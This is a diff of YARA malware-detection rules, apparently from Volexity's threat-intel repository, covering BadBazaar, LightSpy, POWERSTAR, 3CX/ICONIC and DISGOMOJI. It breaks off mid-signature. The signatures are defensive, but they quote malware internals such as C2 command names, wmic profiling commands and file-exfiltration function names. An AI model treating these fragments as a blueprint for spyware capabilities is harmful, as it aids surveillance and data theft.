-		$appname or all of ( $langfilters* ) or all of ( $definitions* ) or $sess
+		all of them
 }
-rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Common_Certificate : EVILBAMBOO FILE
+rule VOLEXITY_Apt_Delivery_Win_Charming_Openvpn_Client : CHARMINGCYPRESS FILE
 {
 	meta:
-		description = "Detection of the common.cer file used for a large BADBAZAAR malware cluster for its certificate pinning for the C2 communication."
+		description = "Detects a fake OpenVPN client developed by CharmingCypress."
 		author = "threatintel@volexity.com"
-		id = "5a033770-7ad3-5c79-90ac-b1e3fff6b5f0"
-		date = "2023-06-01"
-		modified = "2023-06-13"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L230-L255"
+		id = "b69fdd72-4a55-5e83-b754-401fe9339007"
+		date = "2023-10-17"
+		modified = "2023-10-27"
+		reference = "TIB-20231027"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L298-L322"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "861d4e1c40847c6ade04eddb047370d645afea6d5c16d55155fa58a16111c39e"
+		logic_hash = "02596a62cb1ba17ecabef0ae93f434e4774b00422a6da2106a2bc4c59d2f8077"
 		score = 75
 		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405"
+		tags = "CHARMINGCYPRESS, FILE"
+		hash1 = "2d99755d5cd25f857d6d3aa15631b69f570d20f95c6743574f3d3e3e8765f33c"
+		os = "win"
+		os_arch = "all"
 		scan_context = "file"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 9768
+		version = 2
 
 	strings:
-		$b1 = {30 82 03 61 30 82 02 49 a0 03 02 01 02 02 04 2b 6e df 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b}
-		$s1 = "california1"
-		$s2 = "los1"
-		$s3 = "tech1"
-		$s4 = "common1"
-		$s5 = "common0"
-		$s6 = "220401234506Z"
-		$s7 = "470326234506Z0a1"
+		$s1 = "DONE!"
+		$s2 = "AppCore.dll"
+		$s3 = "ultralight@@"
 
 	condition:
-		$b1 at 0 or all of ( $s* )
+		all of ( $s* )
 }
-rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Stage2_Implant_May23 : EVILBAMBOO FILE
+rule VOLEXITY_Apt_Malware_Ps1_Powerstar_Generic : CHARMINGCYPRESS FILE MEMORY
 {
-	meta:
-		description = "Detection of the second stage capability of the BadBazaar android malware that has the main malicious capabilities. Will gather various info about the user/phone and routinely send this to the C2."
-		author = "threatintel@volexity.com"
-		id = "1f97c610-773f-5385-935a-445cb9192157"
-		date = "2023-05-25"
-		modified = "2023-08-30"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L257-L285"
+	meta:
+		description = "Detects POWERSTAR modules based on common HTTP functions used across modules."
+		author = "threatintel@volexity.com"
+		id = "71a3e99d-e1c8-5ac1-abbc-2ba5cba80799"
+		date = "2023-06-02"
+		modified = "2024-01-26"
+		reference = "TIB-20240126"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L323-L351"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "2186369298ebfa0b892ecb14ebacc93c6d14c9c35012e8e6cdff077634cf3773"
+		logic_hash = "4da02190ffd16304eccbc0d12dfcc5637a6b785af0e3dc3dfcafcfe114597eb2"
 		score = 75
 		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629"
-		scan_context = "file"
+		tags = "CHARMINGCYPRESS, FILE, MEMORY"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 9356
+		version = 3
 
 	strings:
-		$c1 = "%{\"command\":\"%s\",\"path\":\"%s\",\"files\":["
-		$c2 = "{\"name\":\"%s\",\"dirs\":\"%d\",\"files\":\"%d\",\"isfolder\":\"%d\",\"path\":\"%s\"},"
-		$s1 = "Timezon id:"
-		$s2 = "China Telecom"
-		$s3 = "China Unicom"
-		$s4 = "ConfigPipe"
-		$s5 = "ForwordTo"
-		$s6 = "can't get camera content"
-		$s7 = "cat /sys/class/net/wlan0/address"
-		$s8 = "_preferences_light"
-		$s9 = "registration_jid"
+		$http1 = "Send_Upload" ascii wide
+		$http2 = "Send_Post_Data" ascii wide
+		$json1 = "{\"OS\":\"" ascii wide
+		$json2 = "{\"ComputerName\":\"' + $env:COMPUTERNAME + '\"}" ascii wide
+		$json3 = "{\"Token\"" ascii wide
+		$json4 = "{\"num\":\"" ascii wide
 
 	condition:
-		1 of ( $c* ) or 5 of ( $s* )
+		all of ( $http* ) or all of ( $json* )
 }
-rule VOLEXITY_Apt_Delivery_Web_Js_Jmask_Str_Array_Variant : EVILBAMBOO FILE
+rule VOLEXITY_Apt_Malware_Win_Deepdata_Module : BRAZENBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects the JMASK profiling script in an obfuscated format using a string array and an offset."
+		description = "Detects modules used by DEEPDATA based on the required export names used by those modules."
 		author = "threatintel@volexity.com"
-		id = "d5d32c8b-53fb-5103-ac73-05f320e71c97"
-		date = "2023-06-27"
-		modified = "2023-09-21"
+		id = "1287f5dd-9229-57ce-a91a-73d61041df80"
+		date = "2024-07-30"
+		modified = "2024-11-14"
 		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L408-L444"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-11-15 BrazenBamboo/rules.yar#L1-L25"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "0ae7c96e0f866f21d66d7a23bf937d6ce48c9dd1ea19142dbb13487208780146"
+		logic_hash = "d36f34343826daf7f7368118c7127c7181a54c99a01803016c9a6965abb309cb"
 		score = 75
 		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf"
-		scan_context = "file"
+		tags = "BRAZENBAMBOO, FILE, MEMORY"
+		hash1 = "c782346bf9e5c08a0c43a85d4991f26b0b3c99c054fa83beb4a9e406906f011e"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10868
+		version = 2
 
 	strings:
-		$array_1 = "http://eular.github.io"
-		$array_2 = "stun:stun.services.mozilla.com"
-		$array_3 = "\xE6\x9C\xAA\xE5\xAE\x89\xE8\xA3\x85MetaMask"
-		$array_4 = "/jquery/jquery.min.js"
-		$array_5 = "onicecandidate"
-		$ios_1 = "['a7', '640x1136', [_0x"
-		$ios_2 = "['a7', _0x"
-		$ios_3 = "['a8', _0x"
-		$ios_4 = "['a8', '750x1334', ['iPhone\\x206']]"
-		$ios_5 = "['a8', '1242x2208', ['iPhone\\x206\\x20Plus']]"
-		$ios_6 = "['a8', _0x"
-		$ios_7 = "['a9', _0x"
-		$ios_8 = "['a9', '750x1334', [_0x"
-		$ios_9 = "['a9', '1242x2208', ['iPhone\\x206s\\x20Plus']]"
-		$ios_10 = "['a9x', '2048x2732', ['iPad\\x20Pro\\x20(1st\\x20gen\\x2012.9-inch)']]"
-		$ios_11 = "['a10x', '1668x2224', [_0x"
-		$header = "info = {}, finished = 0x0;"
+		$str1 = "ExecuteCommand"
+		$str2 = "GetPluginCommandID"
+		$str3 = "GetPluginName"
+		$str4 = "GetPluginVersion"
 
 	condition:
-		3 of ( $array_* ) or 5 of ( $ios_* ) or $header
+		all of them
 }
-rule VOLEXITY_Apt_Delivery_Web_Js_Jmask : EVILBAMBOO FILE
+rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_Core : BRAZENBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects the JMASK profiling script in its minified // obfuscated format."
+		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
 		author = "threatintel@volexity.com"
-		id = "a7b653e1-f7c6-56cc-ab99-3de91d29ef3b"
-		date = "2023-06-15"
-		modified = "2023-09-21"
+		id = "44f8d7a4-7f48-5960-91a7-baf475f7d291"
+		date = "2024-02-15"
+		modified = "2024-07-03"
 		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L446-L472"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-11-15 BrazenBamboo/rules.yar#L244-L287"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "64315ac05049954d36297a616a25ffdd7ce81c6313c0878d5ba4082da24c21bb"
+		logic_hash = "f0189c0a84c53e365130e9683f2f2b2f73c14412d8e4d0251a4780d0e80162d8"
 		score = 75
-		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30"
-		scan_context = "file"
+		quality = 78
+		tags = "BRAZENBAMBOO, FILE, MEMORY"
+		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10246
+		version = 2
 
 	strings:
-		$rev0 = "oi.buhtig.ralue//:ptth" ascii
-		$rev1 = "lairA' xp41" ascii
-		$rev2 = "dnuof ton ksaMateM" ascii
-		$unicode1 = "document[\"\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0053\\u0063\\u0072\\u0069\\u0070\\u0074\"]" ascii
-		$unicode2 = "\\u0061\\u0070\\u0070\\u006c\\u0069\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u002f\\u006a\\u0073\\u006f\\u006e" ascii
-		$unicode3 = "\\u0063\\u006c\\u0069\\u0065\\u006e\\u0074\\u0057\\u0069\\u0064\\u0074\\u0068" ascii
-		$unicode4 = "=window[\"\\u0073\\u0063\\u0072\\u0065\\u0065\\u006e\"]" ascii
-		$header = "(function(){info={};finished=" ascii
+		$s1 = "Enter RunWork......."
+		$s2 = "it's running......."
+		$s3 = "select ret = socket_error."
+		$s4 = "%s\\\\account.bin"
+		$s5 = "[CtrlLink]: get machine sn err:%d"
+		$s6 = "wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /format:list | findstr /v \\\"^$\\\""
+		$s7 = "wmic csproduct get vendor,version /format:list | findstr /v \\\"^$\\\""
+		$s8 = "local ip get sockname error=%d"
+		$s9 = "connect goole dns error=%d"
+		$s10 = "%s/api/terminal/upsert/"
+		$s11 = "/963852741/windows/plugin/manifest"
+		$s12 = "Hello deepdata."
+		$s13 = "Start Light."
+		$s14 = "InitialPluginManager Error."
+		$s15 = "InitialCommandExe Error."
+		$s16 = "ws open, and send logon info."
+		$s17 = "plugin_replay_handler"
+		$s18 = "light_x86.dll"
+		$pdb1 = "\\light\\bin\\light_x86.pdb"
+		$pdb2 = "\\light\\bin\\plugin"
+		$pdb3 = "D:\\tmpWork\\"
 
 	condition:
-		all of ( $rev* ) or all of ( $unicode* ) or $header
+		1 of ( $pdb* ) or 5 of ( $s* )
 }
-rule VOLEXITY_Apt_Malware_Win_Avburner : DEVIOUSBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_C2_Strings : BRAZENBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects AVBurner based on a combination of API calls used, hard-coded strings and bytecode patterns."
+		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
 		author = "threatintel@volexity.com"
-		id = "1bde0861-4820-5bb1-98a3-516092c91be0"
-		date = "2023-01-02"
-		modified = "2024-08-16"
-		reference = "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-07 AVBurner/yara.yar#L1-L40"
+		id = "a0af8fb7-13a3-54e8-8569-e8622fa80d89"
+		date = "2024-02-15"
+		modified = "2024-11-14"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-11-15 BrazenBamboo/rules.yar#L288-L337"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		hash = "4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb"
-		logic_hash = "56ff6c8a4b737959a1219699a0457de1f0c34fead4299033840fb23c56a0caad"
+		logic_hash = "eeaaf6e16d4854a2279bd62596f75cb8b8ec1b05f3b050f5dac97254704b9005"
 		score = 75
-		quality = 80
-		tags = "DEVIOUSBAMBOO, FILE, MEMORY"
+		quality = 78
+		tags = "BRAZENBAMBOO, FILE, MEMORY"
+		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
 		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8780
+		rule_id = 10245
 		version = 4
 
 	strings:
-		$api1 = "PspCreateProcessNotifyRoutineAddress" wide
-		$api2 = "PspCreateThreadNotifyRoutineAddress" wide
-		$api3 = "PspLoadImageNotifyRoutineAddress" wide
-		$str1 = "\\\\.\\RTCORE64" wide
-		$str2 = "\\\\%ws/pipe/%ws" wide
-		$str3 = "CreateServerW Failed %u" wide
-		$str4 = "OpenSCManager Failed %u" wide
-		$str5 = "Get patternAddress" wide
-		$pattern1 = { 4C 8B F9 48 8D 0C C1 E8 }
-		$pattern2 = { 48 8D 0C DD 00 00 00 00  45 33 C0 49 03 CD 48 8B }
-		$pattern3 = { 48 8D 04 C1 48 89 45 70 48 8B C8 E8 }
-		$pattern4 = { 49 8D 0C FC 45 33 C0 48 8B D6 E8 00 00 00 00 00}
-		$pattern5 = { 45 33 C0 48 8D 0C D9 48 8B D7 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-		$pattern6 = { 41 0F BA 6D 00 0A BB 01 00 00 00 4C 8B F2 4C 8B F9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+		$s1 = "[WsClient][Error]:"
+		$s2 = "[WsClient][Info]:"
+		$s3 = "[WsClient]:WsClient"
+		$s4 = "[WsClient][Info]:Ws"
+		$s5 = "WsClient Worker Thread ID=%d"
+		$s6 = "[LightWebClient]:"
+		$s7 = "LightHttpGet err:%s"
+		$s8 = "User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36"
+		$s9 = "KvList Err:%s"
+		$s10 = "dataMultiPart malloc err:%d"
+		$ctrl1 = "CTRL_HEART_BEAT"
+		$ctrl2 = "CTRL_NET_CONFIG"
+		$ctrl3 = "CTRL_COMMAND_PLAN"
+		$ctrl4 = "CTRL_MODIFY_NET_CONFIG"
+		$ctrl5 = "CTRL_UPLOAD_PLUGIN_STATUS"
+		$ctrl6 = "CTRL_PLUGIN_EXECUTE_COMMAND"
+		$ctrl7 = "CTRL_PLUGIN_COMMAND_STATUS"
+		$ctrl8 = "CTRL_PLUGIN_STOP_COMMAND"
+		$ctrl9 = "CTRL_GET_SLEEP_CONFIG"
+		$ctrl10 = "CTRL_MODIFY_SLEEP_CONFIG"
+		$ctrl11 = "CTRL_SLEEP_STATUS"
+		$ctrl12 = "CTRL_UPDATE_PLUGIN"
+		$ctrl13 = "CTRL_DESTROY"
+		$ctrl14 = "CTRL_RECONFIG_REBOUNT_ADDRESS"
+		$ctrl15 = "CTRL_AUTO_UPLOUD_FILE_CONFIG"
+		$ctrl16 = "CTRL_UPLOUD_DEVICE_INFO"
+		$ctrl17 = "CTRL_TEST_VPDN_ACCOUNT"
 
 	condition:
-		all of ( $api* ) or all of ( $str* ) or all of ( $pattern* )
+		3 of ( $s* ) or 5 of ( $ctrl* )
 }
-rule VOLEXITY_Apt_Ico_Uta0040_B64_C2 : UTA0040 FILE
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Modules : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detection of malicious ICO files used in 3CX compromise."
+		description = "Detects DISGOMOJI modules using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "1efb6376-a362-5f03-b4d3-08cd7d634de6"
-		date = "2023-03-30"
-		modified = "2023-03-30"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L1-L31"
+		id = "b9e4ecdc-9b02-546f-9b79-947cb6b1f99a"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L1-L24"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "2667a36ce151c6e964f9ce9a6f587eedbffdd6ec76e451a23c5cfdd08248d15e"
+		logic_hash = "7880288e3230b688b780bdfbac2b0761fd7831b7df233672c2242c21a86e1297"
 		score = 75
 		quality = 80
-		tags = "UTA0040, FILE"
-		hash1 = "a541e5fc421c358e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c"
-		memory_suitable = 0
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10270
+		version = 6
 
 	strings:
-		$IEND_dollar = {49 45 4e 44 ae 42 60 82 24}
-		$IEND_nodollar = {49 45 4e 44 ae 42 60 82 }
+		$s1 = "discord-c2/test/main/finalizing/Deliveries/ob_Delivery.go" wide ascii
+		$s2 = "discord-c2/test/main/finalizing/WAN_Conf.go" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x0000 and filesize < 120KB and ( $IEND_dollar in ( filesize -500 .. filesize ) and not $IEND_nodollar in ( filesize -20 .. filesize ) and for any k in ( 1 .. #IEND_dollar ) : ( for all i in ( 1 .. 4 ) : ( uint8( @IEND_dollar [ k ] + !IEND_dollar [ k ] + i ) < 123 and uint8( @IEND_dollar [ k ] + !IEND_dollar [ k ] + i ) > 47 ) ) )
+		any of them
 }
-rule VOLEXITY_Apt_Mac_Iconic : UTA0040
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Loader : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects the MACOS version of the ICONIC loader."
+		description = "Detects DISGOMOJI loader using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "6d702ed3-e5b9-5324-a06b-507c9231cc00"
-		date = "2023-03-30"
-		modified = "2023-03-30"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L32-L50"
+		id = "6d7848db-f1a5-5ccc-977a-7597b966a31c"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L25-L47"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "7b689c3931632b01869ac2f21a1edca0a5ca9007299fe7cd16962d6866c27558"
+		logic_hash = "d9be4846bab5fffcfd60eaec377443819404f30ec088905c2ee26bd3b7525832"
 		score = 75
 		quality = 80
-		tags = "UTA0040"
-		hash1 = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
-		memory_suitable = 1
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "51a372fee89f885741515fa6fdf0ebce860f98145c9883f2e3e35c0fe4432885"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10269
+		version = 7
 
 	strings:
-		$str1 = "3CX Desktop App" xor(0x01-0xff)
-		$str2 = "__tutma=" xor(0x01-0xff)
-		$str3 = "Mozilla/5.0" xor(0x01-0xff)
+		$s1 = "discord-c2/test/main/delievery.go" wide ascii
 
 	condition:
-		all of them
+		$s1
 }
-rule VOLEXITY_Apt_Win_Iconicstealer : UTA0040
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Debug_String : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detect the ICONICSTEALER malware family."
+		description = "Detects DISGOMOJI using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "d7896506-6ce5-59b1-b24a-87ffdb2a5174"
-		date = "2023-03-30"
-		modified = "2023-03-30"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L51-L69"
+		id = "eed2468f-7e50-5f3e-946a-277c10984823"
+		date = "2024-02-22"
+		modified = "2024-11-27"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L48-L71"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "ed7731d2361e7d96a6a35f8359b61a2af049b16bc457cf870db8831e142aebe2"
+		logic_hash = "6bb130eead39bd8128983e0f2e76cfeff8865ce8ed3cb73b132ed32d68fc0db0"
 		score = 75
 		quality = 80
-		tags = "UTA0040"
-		hash1 = "8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423"
-		memory_suitable = 1
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10268
+		version = 9
 
 	strings:
-		$str1 = "\\3CXDesktopApp\\config.json" wide
-		$str2 = "url, title FROM urls" wide
-		$str3 = "url, title FROM moz_places" wide
+		$s1 = "discord-c2/test/main/payload.go" wide ascii
+		$s2 = "Desktop/Golang_Dev/Discord"
 
 	condition:
-		all of them
+		any of them
 }
-rule VOLEXITY_Apt_Win_Iconic : UTA0040
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_2 : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detect the ICONIC loader."
+		description = "Detects DISGOMOJI malware using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "e7d6fcc0-c830-5236-90fb-182c66873903"
-		date = "2023-03-30"
-		modified = "2023-03-30"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L70-L93"
+		id = "609beb47-5e93-5f69-b89d-2cf62f20851a"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L72-L103"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "b62b1543c9af3afb8fc885f313e1a5d2fcb688657e3807cce72b31b56381681e"
+		logic_hash = "e03a774cca2946c1becdbd775ef465033dae089d578ea18a4f43fd7bdae9168e"
 		score = 75
-		quality = 55
-		tags = "UTA0040"
-		hash1 = "f79c3b0adb6ec7bcc8bc9ae955a1571aaed6755a28c8b17b1d7595ee86840952"
-		memory_suitable = 1
+		quality = 80
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10266
+		version = 9
 
 	strings:
-		$internal_name = "samcli.dll"
-		$str1 = "gzip, deflate, br"
-		$str2 = "__tutma"
-		$str3 = "__tutmc"
-		$str4 = "ChainingModeGCM" wide
-		$str5 = "ChainingMode" wide
-		$str6 = "icon%d.ico" wide
+		$s1 = "downloadFileFromURL" wide ascii
+		$s2 = "createCronJob" wide ascii
+		$s3 = "findAndSendFiles" wide ascii
+		$s4 = "updateLogFile" wide ascii
+		$s5 = "handleZipFile" wide ascii
+		$s6 = "takeScreenshot" wide ascii
+		$s7 = "zipFirefoxProfile" wide ascii
+		$s8 = "zipDirectoryWithParts" wide ascii
+		$s9 = "uploadAndSendToOshi" wide ascii
+		$s10 = "uploadAndSendToLeft" wide ascii
 
 	condition:
-		all of them
+		7 of them
 }
-rule VOLEXITY_Apt_Win_3Cx_Backdoored_Lib : UTA0040
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_1 : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects the malicious library delivered in the backdoored 3CX installer."
+		description = "Detects GOMOJI malware using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "39270b93-830e-598f-a38e-fcc5050e4d30"
-		date = "2023-03-30"
-		modified = "2023-03-30"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L94-L133"
+		id = "f6643e9a-ca41-57e0-9fce-571d340f1cfe"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L104-L131"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "40be2d46a318ff03724ea1f6628d78001c14c85a3ae6d032c0324ea849d707f2"
+		logic_hash = "dd3535079881ae9cfe25c129803668cb595be89b7f62eb82af19cc3839f92b6d"
 		score = 75
 		quality = 80
-		tags = "UTA0040"
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		memory_suitable = 1
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10265
+		version = 7
 
 	strings:
-		$shellcode = {
-                        44 8D 4A ??
-                        44 8D 92 ?? ?? ?? ??
-                        45 85 C9
-                        45 0F 49 D1
-                        41 81 E2 00 FF FF FF
-                        41 F7 DA
-                        44 01 D2
-                        FF C2
-                        4C 63 CA
